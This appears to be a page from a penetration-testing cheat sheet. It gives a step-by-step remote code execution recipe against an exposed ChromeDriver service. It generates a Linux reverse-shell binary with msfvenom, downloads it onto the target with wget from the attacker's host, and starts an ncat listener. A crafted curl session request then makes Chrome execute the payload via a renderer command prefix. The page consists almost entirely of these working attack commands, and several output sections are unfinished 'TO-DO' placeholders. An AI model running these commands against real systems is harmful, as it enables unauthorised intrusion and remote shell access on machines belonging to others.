Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Privesc #1: RCE
1. Create a Payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f elf > rev
Sample Output:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.0.1 LPORT=1337 -f elf > rev
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
2. Upload to Target
wget http://<LOCAL_IP>/rev -o /tmp/rev
Sample Output:
TO-DO# Chmod
chmod 755 /tmp/rev
Sample Output:
TO-DO3. Start a Listener
rlwrap ncat -lvnp <LOCAL_PORT>
Sample Output:
TO-DO3. Create a Sesson with Command
curl -d '{
"capabilities": {
"alwaysMatch": {
"browserName": "chrome",
"goog:chromeOptions": {
"args": ["--headless", "--no-sandbox", "--disable-dev-shm-usage", "--renderer-cmd-prefix=/tmp/rev"],
"prefs": {
}
}
}
}
}' http://<TARGET>:9515/session
Sample Output:
TO-DO